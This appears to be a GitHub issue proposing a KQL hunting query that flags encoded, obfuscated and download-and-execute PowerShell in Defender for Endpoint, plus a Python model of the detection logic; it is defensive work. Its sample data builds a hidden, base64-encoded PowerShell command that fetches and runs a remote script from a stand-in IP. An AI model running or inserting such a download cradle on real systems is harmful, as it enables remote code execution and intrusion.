
Add PowerShell abuse detection KQL query for Defender for Endpoint

Open nezercoker opened this issue 6 months ago • 0 comments

Summary

This PR adds a new KQL hunting query that detects suspicious PowerShell activity in Microsoft Defender for Endpoint.

Query Details

Filename: Device-PowerShell-AbuseDetection.kql
Folder: DefenderForEndpoint/
Use case:
The query is designed to identify potentially malicious use of PowerShell involving:

  • Encoded command execution (-enc)
  • Obfuscation (IEX, Invoke-Expression)
  • Download and execution techniques (Invoke-WebRequest, FromBase64String)

MITRE ATT&CK Coverage

  • T1059.001 – PowerShell
  • T1140 – Deobfuscate/Decode Files or Information
  • T1105 – Ingress Tool Transfer

Author

Taiwo Coker (@nezercoker)


Let me know if you'd like this broken out into a JSON metadata file or converted into a GitHub issue template.

nezercoker, Jul 06 '25 23:07
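A Python model of the detection logic the issue describes, added here as an illustration; it is not the PR's Device-PowerShell-AbuseDetection.kql and not Sentinel-Queries project code. The host-process list, the alternate flag spellings accepted alongside -enc (-e, -ec, -encodedcommand), the ATT&CK mapping per indicator, and the sample rows are assumptions or constructed data; the row field names follow the DeviceProcessEvents columns. It goes one step beyond the three listed indicator groups: it decodes the -enc payload (base64 over UTF-16LE) and re-runs the other checks on the decoded text, because IEX and the download call are often only visible after decoding.

```python
"""Python model of the detection logic the issue describes for its KQL hunting
query. Added example, not the PR's Device-PowerShell-AbuseDetection.kql: it
re-creates the three indicator groups (encoded command, IEX/Invoke-Expression,
Invoke-WebRequest/FromBase64String) so the matching can run offline, and also
decodes -enc payloads, because an encoded command hides IEX and
FromBase64String from a plain command-line match. Row field names mirror the
Defender for Endpoint DeviceProcessEvents columns; all sample rows are
constructed, not real telemetry.
"""
import base64
import re

# Process images that host PowerShell (assumption: these three cover the usual hosts).
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Indicator name -> (ATT&CK technique listed in the issue, pattern).
# The encoded-command pattern accepts -e/-ec/-enc/-encodedcommand (PowerShell
# takes any unambiguous prefix) and captures the base64 blob that follows.
INDICATORS = {
    "encoded_command": ("T1059.001", re.compile(
        r"(?i)(?:^|\s)[-/]e(?:ncodedcommand|ncoded|nc|c)?\s+([A-Za-z0-9+/=]{16,})")),
    "invoke_expression": ("T1059.001", re.compile(r"(?i)\b(?:iex|invoke-expression)\b")),
    "download": ("T1105", re.compile(r"(?i)\b(?:invoke-webrequest|iwr)\b")),
    "base64_decode": ("T1140", re.compile(r"(?i)frombase64string")),
}


def decode_encoded_command(blob: str):
    """Decode an -EncodedCommand payload: base64 over UTF-16LE text.
    Returns None when the blob is not valid base64 or not valid UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_process_event(event: dict):
    """Return a finding dict for one DeviceProcessEvents-style row, or None."""
    if event.get("FileName", "").lower() not in POWERSHELL_HOSTS:
        return None
    cmdline = event.get("ProcessCommandLine", "")
    hits, decoded = {}, None
    for name, (technique, pattern) in INDICATORS.items():
        match = pattern.search(cmdline)
        if match:
            hits[name] = technique
            if name == "encoded_command":
                decoded = decode_encoded_command(match.group(1))
    # Second pass over the decoded payload: this is where IEX and the
    # download call usually live when -enc is used.
    if decoded:
        for name, (technique, pattern) in INDICATORS.items():
            if name != "encoded_command" and pattern.search(decoded):
                hits[name] = technique
    if not hits:
        return None
    return {
        "DeviceName": event.get("DeviceName"),
        "Indicators": sorted(hits),
        "Techniques": sorted(set(hits.values())),
        "DecodedCommand": decoded,
    }


def run_detection(events):
    """Apply analyze_process_event to every row; keep only findings."""
    return [f for f in (analyze_process_event(e) for e in events) if f]


# --- constructed sample rows -------------------------------------------------
# The hidden script is built here so the -enc blob is genuine UTF-16LE base64.
HIDDEN_SCRIPT = "IEX (Invoke-WebRequest -Uri http://192.0.2.10/stage.ps1 -UseBasicParsing).Content"
ENC_BLOB = base64.b64encode(HIDDEN_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"DeviceName": "ws01", "FileName": "powershell.exe",
     "ProcessCommandLine": f"powershell.exe -nop -w hidden -enc {ENC_BLOB}"},
    {"DeviceName": "ws02", "FileName": "pwsh.exe",
     "ProcessCommandLine": "pwsh.exe -c \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aGVsbG8='))\""},
    {"DeviceName": "ws03", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"DeviceName": "ws04", "FileName": "notepad.exe",
     "ProcessCommandLine": "notepad.exe iex-notes.txt"},
]

if __name__ == "__main__":
    for finding in run_detection(SAMPLE_EVENTS):
        print(finding)
```

Running the block flags ws01 (encoded command plus, after decoding, IEX and Invoke-WebRequest) and ws02 (FromBase64String), and leaves the signed-script launch on ws03 and the non-PowerShell process on ws04 alone. In the KQL version the literal indicators correspond to `has_any` over ProcessCommandLine and the flag spellings to `matches regex`; whether the query decodes -enc payloads is a separate design choice, which is why the raw -enc match is kept as its own indicator here rather than relying on what the decoded text reveals.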